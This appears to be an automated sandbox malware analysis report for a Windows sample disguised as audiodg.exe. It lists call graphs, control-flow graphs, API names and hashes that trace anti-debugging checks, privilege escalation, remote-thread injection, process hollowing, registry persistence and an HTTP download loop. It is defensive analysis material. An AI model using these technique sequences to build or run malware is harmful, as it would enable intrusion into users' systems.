1122->1287 1124 7ff7a91b1c9a 1288 7ff7a91b1050 LoadLibraryA GetProcAddress 1124->1288 1126 7ff7a91b1cb4 1289 7ff7a91b1050 LoadLibraryA GetProcAddress 1126->1289 1128 7ff7a91b1cce 1129 7ff7a91b321c IsDebuggerPresent 1128->1129 1130 7ff7a91b322a 1129->1130 1131 7ff7a91b322e GetCurrentProcess CheckRemoteDebuggerPresent 1129->1131 1130->843 1130->844 1131->1130 1133 7ff7a91b428a GetTokenInformation 1132->1133 1135 7ff7a91b3481 1132->1135 1290 7ff7a91b3b54 VirtualAlloc 1133->1290 1143 7ff7a91b3ce4 GetModuleFileNameW 1135->1143 1136 7ff7a91b42bb GetTokenInformation 1137 7ff7a91b4302 AdjustTokenPrivileges CloseHandle 1136->1137 1138 7ff7a91b42e8 CloseHandle 1136->1138 1291 7ff7a91b3b24 1137->1291 1139 7ff7a91b3b24 VirtualFree 1138->1139 1140 7ff7a91b42fd 1139->1140 1140->1135 1144 7ff7a91b3dd2 wcsncpy 1143->1144 1145 7ff7a91b3d0f PathFindFileNameW wcslen 1143->1145 1146 7ff7a91b3d49 1144->1146 1145->1146 1146->848 1148 7ff7a91b43d0 GetLastError 1147->1148 1149 7ff7a91b356d 1147->1149 1148->1149 1150 7ff7a91b43dd CloseHandle 1148->1150 1149->879 1149->880 1150->1149 1294 7ff7a91b38c4 1151->1294 1153 7ff7a91b32fd 1297 7ff7a91b46e4 CreateFileW 1153->1297 1155 7ff7a91b3357 CreateThread 1155->872 1156 7ff7a91b3315 1156->1155 1309 7ff7a91b40c4 1156->1309 1161 7ff7a91b38c4 11 API calls 1160->1161 1162 7ff7a91b328c 1161->1162 1348 7ff7a91b44b4 CreateFileW 1162->1348 1166 7ff7a91b3744 3 API calls 1165->1166 1167 7ff7a91b3a9f 1166->1167 1168 7ff7a91b38c4 11 API calls 1167->1168 1169 7ff7a91b3aa9 GetModuleFileNameW DeleteFileW CopyFileW 1168->1169 1170 7ff7a91b3aeb SetFileAttributesW 1169->1170 1172 7ff7a91b35a7 1169->1172 1360 7ff7a91b39b4 RegOpenKeyExW 1170->1360 1173 7ff7a91b33ec GetVersionExW 1172->1173 1174 7ff7a91b341d 1173->1174 1174->883 1174->884 1175->900 1176->902 1177->904 1178->906 1179->908 1180->910 1181->912 1182->914 1183->916 1184->918 1185->920 1186->922 1187->924 1188->926 1189->928 1190->930 1191->932 1192->934 1193->936 1194->938 1195->940 1196->942 1197->944 1198->946 1199->948 1200->950 1201->952 1202->954 1203->956 1204->958 1205->960 1206->962 1207->964 1208->966 1209->968 1210->970 1211->972 1212->974 1213->976 1214->978 1215->980 1216->982 1217->984 1218->986 1219->988 1220->990 1221->992 1222->994 1223->996 1224->998 1225->1000 1226->1002 1227->1004 1228->1006 1229->1008 1230->1010 1231->1012 1232->1014 1233->1016 1234->1018 1235->1020 1236->1022 1237->1024 1238->1026 1239->1028 1240->1030 1241->1032 1242->1034 1243->1036 1244->1038 1245->1040 1246->1042 1247->1044 1248->1046 1249->1048 1250->1050 1251->1052 1252->1054 1253->1056 1254->1058 1255->1060 1256->1062 1257->1064 1258->1066 1259->1068 1260->1070 1261->1072 1262->1074 1263->1076 1264->1078 1265->1080 1266->1082 1267->1084 1268->1086 1269->1088 1270->1090 1271->1092 1272->1094 1273->1096 1274->1098 1275->1100 1276->1102 1277->1104 1278->1106 1279->1108 1280->1110 1281->1112 1282->1114 1283->1116 1284->1118 1285->1120 1286->1122 1287->1124 1288->1126 1289->1128 1290->1136 1292 7ff7a91b3b35 VirtualFree 1291->1292 1293 7ff7a91b3b48 1291->1293 1292->1293 1293->1135 1324 7ff7a91b3744 GetWindowsDirectoryW 1294->1324 1296 7ff7a91b38f3 8 API calls 1296->1153 1298 7ff7a91b4745 GetFileSize GetProcessHeap RtlAllocateHeap 1297->1298 1299 7ff7a91b473e 1297->1299 1300 7ff7a91b47a0 ReadFile 1298->1300 1301 7ff7a91b478e CloseHandle 1298->1301 1299->1156 1302 7ff7a91b47ef 1300->1302 1303 7ff7a91b47c7 GetProcessHeap HeapFree CloseHandle 1300->1303 1301->1299 1304 7ff7a91b4808 GetProcessHeap HeapFree CloseHandle 1302->1304 1306 7ff7a91b4830 1302->1306 1303->1299 1304->1299 1305 7ff7a91b499b GetProcessHeap HeapFree CloseHandle 1305->1299 1306->1305 1307 7ff7a91b48eb GetProcessHeap RtlAllocateHeap 1306->1307 1308 7ff7a91b4934 1307->1308 1308->1305 1329 7ff7a91b4004 CreateToolhelp32Snapshot 1309->1329 1312 7ff7a91b40e4 1313 7ff7a91b414b GetCurrentProcess OpenProcessToken 1312->1313 1314 7ff7a91b41c2 OpenProcess 1313->1314 1315 7ff7a91b4168 LookupPrivilegeValueW 1313->1315 1318 7ff7a91b41e4 1314->1318 1319 7ff7a91b41ee 1314->1319 1316 7ff7a91b4190 AdjustTokenPrivileges 1315->1316 1317 7ff7a91b41b7 CloseHandle 1315->1317 1316->1317 1317->1314 1321 7ff7a91b424f 1318->1321 1322 7ff7a91b4244 CloseHandle 1318->1322 1319->1318 1323 7ff7a91b4222 WaitForSingleObject 1319->1323 1336 7ff7a91b2cb8 1319->1336 1321->1155 1322->1321 1323->1313 1323->1318 1325 7ff7a91b3798 GetVolumeInformationW 1324->1325 1326 7ff7a91b378e 1324->1326 1327 7ff7a91b3814 1325->1327 1326->1325 1328 7ff7a91b387e wsprintfW 1327->1328 1328->1296 1330 7ff7a91b403f Process32FirstW 1329->1330 1331 7ff7a91b3342 1329->1331 1332 7ff7a91b4099 CloseHandle 1330->1332 1333 7ff7a91b405e wcscmp 1330->1333 1331->1312 1332->1331 1334 7ff7a91b4082 Process32NextW 1333->1334 1335 7ff7a91b4075 1333->1335 1334->1332 1334->1333 1335->1332 1337 7ff7a91b2d0b 1336->1337 1339 7ff7a91b2d2b 1337->1339 1340 7ff7a91b2d4d VirtualAllocEx 1337->1340 1344 7ff7a91b2a88 1337->1344 1339->1319 1340->1339 1341 7ff7a91b2d87 WriteProcessMemory 1340->1341 1341->1339 1342 7ff7a91b2dd0 VirtualProtectEx 1341->1342 1342->1339 1343 7ff7a91b2e03 CreateRemoteThread 1342->1343 1343->1337 1343->1339 1345 7ff7a91b2b01 1344->1345 1346 7ff7a91b2c0a StrStrA 1345->1346 1347 7ff7a91b2b08 1345->1347 1346->1345 1346->1347 1347->1337 1349 7ff7a91b450a 1348->1349 1350 7ff7a91b452b GetLastError 1348->1350 1354 7ff7a91b4404 GetFileSize 1349->1354 1351 7ff7a91b329f CreateThread Sleep 1350->1351 1351->870 1359 7ff7a91b3b54 VirtualAlloc 1354->1359 1356 7ff7a91b4430 1357 7ff7a91b447a CloseHandle 1356->1357 1358 7ff7a91b4444 SetFilePointer ReadFile 1356->1358 1357->1351 1358->1357 1359->1356 1361 7ff7a91b39f5 1360->1361 1362 7ff7a91b39f9 RegSetValueExW RegCloseKey 1360->1362 1361->1172 1362->1361 1412 7ff7a91b2f9c 1413 7ff7a91b38c4 11 API calls 1412->1413 1414 7ff7a91b2fdb 1413->1414 1415 7ff7a91b46e4 17 API calls 1414->1415 1416 7ff7a91b2fff 1415->1416 1417 7ff7a91b40c4 5 API calls 1416->1417 1418 7ff7a91b3022 1417->1418 1419 7ff7a91b40e4 13 API calls 1418->1419 1420 7ff7a91b3037 GetProcessHeap HeapFree 1419->1420 1433 7ff7a91b1cdc 1434 7ff7a91b1d06 InternetOpenW 1433->1434 1435 7ff7a91b1d40 InternetOpenUrlW 1434->1435 1436 7ff7a91b1d33 Sleep 1434->1436 1437 7ff7a91b1dc9 HttpQueryInfoA 1435->1437 1438 7ff7a91b1d77 InternetOpenUrlW 1435->1438 1436->1434 1439 7ff7a91b1df8 InternetCloseHandle InternetCloseHandle Sleep 1437->1439 1440 7ff7a91b1e1e 1437->1440 1438->1437 1441 7ff7a91b1dae InternetCloseHandle Sleep 1438->1441 1439->1434 1442 7ff7a91b1e85 HttpQueryInfoA GetProcessHeap RtlAllocateHeap 1440->1442 1443 7ff7a91b1e28 InternetCloseHandle InternetOpenUrlW 1440->1443 1441->1434 1445 7ff7a91b1eea InternetCloseHandle InternetCloseHandle 1442->1445 1449 7ff7a91b1f04 1442->1449 1443->1442 1444 7ff7a91b1e6a InternetCloseHandle Sleep 1443->1444 1444->1434 1446 7ff7a91b1f83 1445->1446 1447 7ff7a91b1f0c InternetReadFile 1448 7ff7a91b1f5a InternetCloseHandle InternetCloseHandle 1447->1448 1447->1449 1448->1446 1449->1447 1449->1448 1450 7ff7a91b30dc 1456 7ff7a91b30e5 1450->1456 1451 7ff7a91b31d1 1454 7ff7a91b3c24 RegDeleteKeyW 1454->1456 1455 7ff7a91b3e24 9 API calls 1455->1456 1456->1451 1456->1454 1456->1455 1457 7ff7a91b39b4 3 API calls 1456->1457 1459 7ff7a91b45c4 CreateFileW 1456->1459 1464 7ff7a91b3b84 RegOpenKeyExW 1456->1464 1458 7ff7a91b31c1 Sleep 1457->1458 1458->1456 1460 7ff7a91b461f 1459->1460 1461 7ff7a91b465a 1459->1461 1467 7ff7a91b4544 SetFilePointer WriteFile SetEndOfFile 1460->1467 1461->1456 1463 7ff7a91b463b SetFileAttributesW CloseHandle 1463->1461 1465 7ff7a91b3c12 1464->1465 1466 7ff7a91b3bd8 RegSetValueExW RegCloseKey 1464->1466 1465->1456 1466->1465 1467->1463 1363 7ff7a91b33cc 1366 7ff7a91b2048 GetModuleFileNameW 1363->1366 1367 7ff7a91b20c9 1366->1367 1373 7ff7a91b20c4 1366->1373 1368 7ff7a91b2107 1367->1368 1369 7ff7a91b211d 1367->1369 1370 7ff7a91b2111 1368->1370 1371 7ff7a91b213b 1368->1371 1409 7ff7a91b1f88 ExpandEnvironmentStringsW 1369->1409 1370->1373 1411 7ff7a91b2008 ExpandEnvironmentStringsW 1370->1411 1410 7ff7a91b1fc8 ExpandEnvironmentStringsW 1371->1410 1374 7ff7a91b2132 1374->1373 1377 7ff7a91b218d CreateProcessW 1374->1377 1377->1373 1378 7ff7a91b21e8 CreateFileW 1377->1378 1378->1373 1379 7ff7a91b222f GetFileSize 1378->1379 1380 7ff7a91b2257 CloseHandle 1379->1380 1381 7ff7a91b224d 1379->1381 1380->1373 1381->1380 1382 7ff7a91b2267 VirtualAlloc 1381->1382 1383 7ff7a91b22a1 ReadFile 1382->1383 1384 7ff7a91b2291 CloseHandle 1382->1384 1385 7ff7a91b22f1 CloseHandle GetThreadContext 1383->1385 1386 7ff7a91b22ce VirtualFree CloseHandle 1383->1386 1384->1373 1387 7ff7a91b2341 VirtualFree 1385->1387 1388 7ff7a91b2359 ReadProcessMemory GetModuleHandleA GetProcAddress 1385->1388 1386->1373 1387->1373 1389 7ff7a91b23dc 1388->1389 1390 7ff7a91b23e0 VirtualFree 1389->1390 1391 7ff7a91b23f8 VirtualAllocEx 1389->1391 1390->1373 1392 7ff7a91b2463 VirtualFree 1391->1392 1393 7ff7a91b247b WriteProcessMemory 1391->1393 1392->1373 1394 7ff7a91b24b1 VirtualFree 1393->1394 1396 7ff7a91b24c9 1393->1396 1394->1373 1395 7ff7a91b24ff WriteProcessMemory 1395->1396 1397 7ff7a91b258a VirtualFree 1395->1397 1396->1395 1400 7ff7a91b25a7 1396->1400 1397->1373 1398 7ff7a91b2619 RtlCompareMemory 1398->1400 1406 7ff7a91b266c 1398->1406 1399 7ff7a91b2898 WriteProcessMemory SetThreadContext 1401 7ff7a91b2933 ResumeThread 1399->1401 1402 7ff7a91b291e VirtualFree 1399->1402 1400->1398 1400->1399 1403 7ff7a91b2945 VirtualFree 1401->1403 1404 7ff7a91b295a VirtualFree 1401->1404 1402->1373 1403->1373 1404->1373 1405 7ff7a91b2893 1405->1399 1406->1405 1407 7ff7a91b279c ReadProcessMemory WriteProcessMemory 1406->1407 1407->1406 1408 7ff7a91b2871 VirtualFree 1407->1408 1408->1373 1409->1374 1410->1374 1411->1374 1424 7ff7a91b338c 1425 7ff7a91b2048 36 API calls 1424->1425 1426 7ff7a91b339c 1425->1426 1427 7ff7a91b2f0c CreateMutexA 1428 7ff7a91b2f31 ReleaseMutex CloseHandle 1427->1428 1429 7ff7a91b2f4e GetLastError 1427->1429 1430 7ff7a91b2f90 1428->1430 1431 7ff7a91b2f78 ReleaseMutex CloseHandle 1429->1431 1432 7ff7a91b2f5b ReleaseMutex CloseHandle 1429->1432 1431->1430 1432->1430 1468 7ff7a91b31ec 1469 7ff7a91b31f5 1468->1469 1470 7ff7a91b320e 1469->1470 1473 7ff7a91b306c 1469->1473 1478 7ff7a91b2e6c CreateMutexA 1473->1478 1476 7ff7a91b3087 Sleep CreateThread WaitForSingleObject 1477 7ff7a91b30cc Sleep 1476->1477 1477->1469 1479 7ff7a91b2eb5 GetLastError 1478->1479 1480 7ff7a91b2e98 ReleaseMutex CloseHandle 1478->1480 1482 7ff7a91b2ec2 ReleaseMutex CloseHandle 1479->1482 1483 7ff7a91b2edf ReleaseMutex CloseHandle 1479->1483 1481 7ff7a91b2ef7 1480->1481 1481->1476 1481->1477 1482->1481 1483->1481

                                                                                                                                                                  Callgraph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                  • Disassembly available
                                                                                                                                                                  callgraph 0 Function_00007FF7A91BD33F 1 Function_00007FF7A91BDC46 2 Function_00007FF7A91B4544 3 Function_00007FF7A91B3744 89 Function_00007FF7A91B3714 3->89 4 Function_00007FF7A91BD339 5 Function_00007FF7A91BA052 6 Function_00007FF7A91B1050 7 Function_00007FF7A91BDC55 8 Function_00007FF7A91BCD54 9 Function_00007FF7A91B3B54 10 Function_00007FF7A91B2048 28 Function_00007FF7A91B1F88 10->28 61 Function_00007FF7A91B1FC8 10->61 93 Function_00007FF7A91B2008 10->93 11 Function_00007FF7A91BA04E 12 Function_00007FF7A91B3B24 13 Function_00007FF7A91B3C24 14 Function_00007FF7A91B3E24 15 Function_00007FF7A91BC91A 16 Function_00007FF7A91BD91D 17 Function_00007FF7A91B321C 18 Function_00007FF7A91BF232 19 Function_00007FF7A91BF281 20 Function_00007FF7A91BA27F 21 Function_00007FF7A91B3B84 22 Function_00007FF7A91BA778 23 Function_00007FF7A91BF278 24 Function_00007FF7A91B2978 25 Function_00007FF7A91B327C 54 Function_00007FF7A91B38C4 25->54 72 Function_00007FF7A91B44B4 25->72 26 Function_00007FF7A91BEF92 27 Function_00007FF7A91BA188 29 Function_00007FF7A91B2A88 29->24 30 Function_00007FF7A91B338C 30->10 31 Function_00007FF7A91BA061 32 Function_00007FF7A91BD361 33 Function_00007FF7A91BB15F 34 Function_00007FF7A91BCF65 35 Function_00007FF7A91BD365 36 Function_00007FF7A91B3C64 37 Function_00007FF7A91B4264 37->9 37->12 38 Function_00007FF7A91BA05A 39 Function_00007FF7A91BDE59 40 Function_00007FF7A91BA258 41 Function_00007FF7A91BC65C 42 Function_00007FF7A91B345C 42->17 42->25 42->37 46 Function_00007FF7A91B3A74 42->46 64 Function_00007FF7A91B10A0 42->64 65 Function_00007FF7A91B43A4 42->65 88 Function_00007FF7A91B3F14 42->88 96 Function_00007FF7A91B3CE4 42->96 108 Function_00007FF7A91B33EC 42->108 109 Function_00007FF7A91B32EC 42->109 43 Function_00007FF7A91BA772 44 Function_00007FF7A91BDE70 45 Function_00007FF7A91BA776 46->3 46->54 71 Function_00007FF7A91B39B4 46->71 47 Function_00007FF7A91B4674 48 Function_00007FF7A91BC673 49 Function_00007FF7A91B2E6C 50 Function_00007FF7A91B306C 50->49 51 Function_00007FF7A91BDCC2 52 Function_00007FF7A91BDEC1 53 Function_00007FF7A91BD0C4 54->3 55 Function_00007FF7A91B40C4 78 Function_00007FF7A91B4004 55->78 56 Function_00007FF7A91B45C4 56->2 57 Function_00007FF7A91BD8B8 58 Function_00007FF7A91B2CB8 58->29 59 Function_00007FF7A91BEBBE 60 Function_00007FF7A91BA2D0 62 Function_00007FF7A91B33CC 62->10 63 Function_00007FF7A91BC9CB 64->6 76 Function_00007FF7A91B1000 64->76 66 Function_00007FF7A91BE999 67 Function_00007FF7A91BE997 68 Function_00007FF7A91B359D 69 Function_00007FF7A91B2F9C 69->36 69->54 69->55 95 Function_00007FF7A91B46E4 69->95 97 Function_00007FF7A91B40E4 69->97 70 Function_00007FF7A91BE99B 79 Function_00007FF7A91B4404 72->79 73 Function_00007FF7A91BBEAD 74 Function_00007FF7A91B33AC 74->10 75 Function_00007FF7A91BC501 77 Function_00007FF7A91BD904 79->9 80 Function_00007FF7A91BABF9 81 Function_00007FF7A91BC2F9 82 Function_00007FF7A91BABF7 83 Function_00007FF7A91BC2F7 84 Function_00007FF7A91B36FC 85 Function_00007FF7A91BABFB 86 Function_00007FF7A91BD615 87 Function_00007FF7A91BD915 90 Function_00007FF7A91B3609 91 Function_00007FF7A91BB508 92 Function_00007FF7A91BE008 94 Function_00007FF7A91B2F0C 95->47 97->58 98 Function_00007FF7A91BB3DA 99 Function_00007FF7A91BEFD8 100 Function_00007FF7A91BA0DD 101 Function_00007FF7A91B1CDC 102 Function_00007FF7A91B30DC 102->13 102->14 102->21 102->56 102->71 103 Function_00007FF7A91BABF2 104 Function_00007FF7A91BBCF1 105 Function_00007FF7A91BC2F5 106 Function_00007FF7A91BB2F4 107 Function_00007FF7A91BE8F3 109->36 109->54 109->55 109->95 109->97 110 Function_00007FF7A91B31EC 110->50 111 Function_00007FF7A91B36EC

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 231 7ff7a91b345c-7ff7a91b3472 call 7ff7a91b10a0 call 7ff7a91b321c 236 7ff7a91b3474-7ff7a91b3476 ExitProcess 231->236 237 7ff7a91b347c-7ff7a91b34aa call 7ff7a91b4264 call 7ff7a91b3ce4 call 7ff7a91b3f14 231->237 244 7ff7a91b34fb-7ff7a91b350e call 7ff7a91b3f14 237->244 245 7ff7a91b34ac-7ff7a91b34bd call 7ff7a91b43a4 237->245 252 7ff7a91b3510-7ff7a91b3521 call 7ff7a91b43a4 244->252 253 7ff7a91b354c-7ff7a91b355f call 7ff7a91b3f14 244->253 250 7ff7a91b34d2-7ff7a91b34d4 ExitProcess 245->250 251 7ff7a91b34bf-7ff7a91b34d0 call 7ff7a91b43a4 245->251 251->250 260 7ff7a91b34da call 7ff7a91b32ec 251->260 263 7ff7a91b3523-7ff7a91b3525 ExitProcess 252->263 264 7ff7a91b352b call 7ff7a91b327c 252->264 261 7ff7a91b3561-7ff7a91b3572 call 7ff7a91b43a4 253->261 262 7ff7a91b35a2-7ff7a91b35b8 call 7ff7a91b3a74 call 7ff7a91b33ec 253->262 271 7ff7a91b34df-7ff7a91b34e4 260->271 278 7ff7a91b3574-7ff7a91b3576 ExitProcess 261->278 279 7ff7a91b357c call 7ff7a91b327c 261->279 282 7ff7a91b35ba-7ff7a91b35cb call 7ff7a91b43a4 262->282 283 7ff7a91b360e-7ff7a91b36d0 CreateThread * 3 WaitForSingleObject * 3 ExitProcess 262->283 269 7ff7a91b3530-7ff7a91b3535 264->269 273 7ff7a91b3544-7ff7a91b3546 ExitProcess 269->273 274 7ff7a91b3537-7ff7a91b3542 Sleep 269->274 276 7ff7a91b34e6-7ff7a91b34f1 Sleep 271->276 277 7ff7a91b34f3-7ff7a91b34f5 ExitProcess 271->277 274->269 276->271 284 7ff7a91b3581-7ff7a91b3586 279->284 289 7ff7a91b35e0-7ff7a91b35e2 ExitProcess 282->289 290 7ff7a91b35cd-7ff7a91b35de call 7ff7a91b43a4 282->290 286 7ff7a91b3595-7ff7a91b3597 ExitProcess 284->286 287 7ff7a91b3588-7ff7a91b3593 Sleep 284->287 287->284 290->289 293 7ff7a91b35e8 call 7ff7a91b32ec 290->293 295 7ff7a91b35ed-7ff7a91b35f2 293->295 296 7ff7a91b3601-7ff7a91b3603 ExitProcess 295->296 297 7ff7a91b35f4-7ff7a91b35ff Sleep 295->297 297->295
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                  • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                  • API String ID: 613740775-1953711635
                                                                                                                                                                  • Opcode ID: 31553c019a40e59f8029305eb783abe107710fc58d50c27d998bbdd7f76d6dd3
                                                                                                                                                                  • Instruction ID: 0b4550e609804ef1ace19be7832b13da796b37b85031e74260f08a93080f3134
                                                                                                                                                                  • Opcode Fuzzy Hash: 31553c019a40e59f8029305eb783abe107710fc58d50c27d998bbdd7f76d6dd3
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C61FC20A1FA5391EA66BF31F85527AA2B2EF84740FC64135E44EC65F5CE2DE5368230

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 434396405-0
                                                                                                                                                                  • Opcode ID: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                  • Instruction ID: a1c2eca8567d78a82139ea56b01fe9258f5495b3706dbf2a7889c24ecce09da9
                                                                                                                                                                  • Opcode Fuzzy Hash: 906cecabab3cd27e08f2376114ae2c378e45192d3ef69b8435bc731b0b72a338
                                                                                                                                                                  • Instruction Fuzzy Hash: AF31F23261AA8186E751AF15F45062EF7B1FBC8780F515135FA8A83BB8DF3CD4518B10

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3920101602-0
                                                                                                                                                                  • Opcode ID: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                  • Instruction ID: 8994e95279a1ed2ccac00062e453188f2513c28bc1deeb091bb1e7f6f6d24472
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a6d4a932f5469025ed13b66ad34693541af773f9e8b826c55cb2142a42793b4
                                                                                                                                                                  • Instruction Fuzzy Hash: F7F03010A0F24281E6326F55F40436DA7F1EF45B44F8101B4E58D855B4CF2CD636DB21

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4294037311-0
                                                                                                                                                                  • Opcode ID: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                  • Instruction ID: 0a7064d09bd3fc69b52496ff9b647eef24976861ffdad95a9ddd74a9f95120c8
                                                                                                                                                                  • Opcode Fuzzy Hash: 7b7f23db395eba8d18a11b8c6077d8c5ef125244b6b8ccbe54b8300fae36e676
                                                                                                                                                                  • Instruction Fuzzy Hash: 15F03025B0E651D2EA216F20F44537DA3B1FB95700F954435D98EC2AB4CF2DD9299620

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 328 7ff7a91b1050-7ff7a91b108c LoadLibraryA GetProcAddress
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.2170584190.00007FF7A91B1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7A91B0000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.2170557557.00007FF7A91B0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170631034.00007FF7A91B5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170667230.00007FF7A91B7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170711530.00007FF7A91B8000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  • Associated: 00000008.00000002.2170745898.00007FF7A91BA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_8_2_7ff7a91b0000_audiodg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2574300362-0
                                                                                                                                                                  • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                  • Instruction ID: 9edf9f7fbe465b6f84d3465e37a1411f2084efac07466daff958b158677f4252
                                                                                                                                                                  • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                  • Instruction Fuzzy Hash: 23E09276509F8086CA20AF15F84001AB7B4FBC9794F904225EACD82B38DF3CC165CB00

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 329 7ff7a91b3b24-7ff7a91b3b33 330 7ff7a91b3b35-7ff7a91b3b42 VirtualFree 329->330 331 7ff7a91b3b48-7ff7a91b3b4c 329->331 330->331
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
